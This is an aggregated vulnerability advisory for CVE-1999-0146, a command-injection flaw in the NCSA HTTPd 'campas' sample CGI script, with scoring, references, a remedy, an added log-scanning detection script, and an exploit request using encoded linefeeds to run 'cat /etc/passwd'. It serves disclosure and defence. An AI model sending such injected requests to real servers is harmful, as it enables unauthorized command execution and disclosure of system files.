CVE-1999-0146
CVSS 7.5
Published: 1997-07-15 00:00:00
Last modified: 2008-09-09 08:33:50

[Original] The campas CGI program provided with some NCSA web servers allows an attacker to execute arbitrary commands via encoded carriage return characters in the query string, as demonstrated by reading the password file.


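[CNNVD] NCSA HTTPd sample script vulnerability (CNNVD-199707-024)

        The campas CGI program provided with some NCSA web servers is vulnerable. An attacker can execute arbitrary commands via encoded carriage return characters in the query string, as demonstrated by reading the password file.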

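- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]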

- CPE (affected platforms and products)

cpe:/a:ncsa:campas
cpe:/a:ncsa:servers

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0146
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0146
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199707-024
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/298
(UNKNOWN)  XF  http-cgi-campas(298)
http://www.securityfocus.com/bid/1975
(UNKNOWN)  BID  1975

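- Vulnerability information

NCSA HTTPd sample script vulnerability
High risk  Input validation
1997-07-15 00:00:00 2006-11-16 00:00:00
Remote / Local
        The campas CGI program provided with some NCSA web servers is vulnerable. An attacker can execute arbitrary commands via encoded carriage return characters in the query string, as demonstrated by reading the password file.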

- Advisories and patches

        Delete the sample script, as it is not necessary for normal web server function.

- Vulnerability information (20423)

NCSA httpd-campas 1.2 sample script Vulnerability (EDBID:20423)
cgi remote
1997-07-15 Verified
0 Francisco Torres
N/A
source: http://www.securityfocus.com/bid/1975/info

Campas is a sample CGI script shipped with some older versions of NCSA HTTPd, an obsolete web server package. The versions that included the script could not be determined as the server is no longer maintained, but version 1.2 of the script itself is known to be vulnerable. The script fails to properly filter user-supplied variables, and as a result can be used to execute commands on the host with the privileges of the web server. Commands can be passed as a variable to the script, separated by %0a (linefeed) characters. See exploit for example. Successful exploitation of this vulnerability could be used to deface the web site, read any files the server process has access to, get directory listings, and execute anything else the web server has access to.

> telnet target 80
[...]
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
<PRE>
root:x:0:1:Super-User:/export/home/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:/bin/false
[...]
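
A detection sketch for the request pattern above, added here as an example and not part of the original advisory or of NCSA HTTPd: it scans Common Log Format access-log lines for CGI requests whose query string decodes to a carriage return or linefeed. The `/cgi-bin/` prefix, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# NCSA Common Log Format: host ident user [time] "request" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) \S+$')
CGI_PREFIX = "/cgi-bin/"  # assumption: URL prefix under which CGI scripts run

# Constructed sample log lines (documentation-range addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jul/1997:10:00:01 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.10 - - [15/Jul/1997:10:00:05 +0000] "GET /cgi-bin/search?q=httpd+docs HTTP/1.0" 200 512',
    '198.51.100.7 - - [15/Jul/1997:10:02:11 +0000] "GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a" 200 734',
    '203.0.113.9 - - [15/Jul/1997:10:02:40 +0000] "GET /cgi-bin/guestbook?name=a%250Db HTTP/1.0" 200 60',
    '203.0.113.4 - - [15/Jul/1997:10:03:00 +0000] "GET /docs/a?x=%0a HTTP/1.0" 404 -',
]

def find_newline_injection(lines, max_decode=3):
    """Return (host, path, status) for each CGI request whose query string
    contains a CR or LF after percent-decoding."""
    hits = []
    for line in lines:
        m = CLF.match(line.strip())
        if not m:
            continue  # not a Common Log Format line
        host, request, status = m.groups()
        parts = request.split(" ")
        if len(parts) < 2:
            continue
        # The request may lack an HTTP version, as in the transcript above.
        path, _, query = parts[1].partition("?")
        if not path.startswith(CGI_PREFIX) or not query:
            continue
        decoded = query.encode("utf-8")
        # Decode repeatedly so nested encodings such as %250a are also caught.
        for _ in range(max_decode):
            nxt = unquote_to_bytes(decoded)
            if nxt == decoded:
                break
            decoded = nxt
        if b"\n" in decoded or b"\r" in decoded:
            hits.append((host, path, int(status)))
    return hits

if __name__ == "__main__":
    for hit in find_newline_injection(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged request to a sample script is the case to triage first, since the advisory's remedy is to delete the script entirely.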

		

- Vulnerability information

29
NCSA campas CGI Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Workaround
Exploit Public Uncoordinated Disclosure

- Vulnerability description

- Timeline

1997-07-15 Unknown
1997-07-15 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
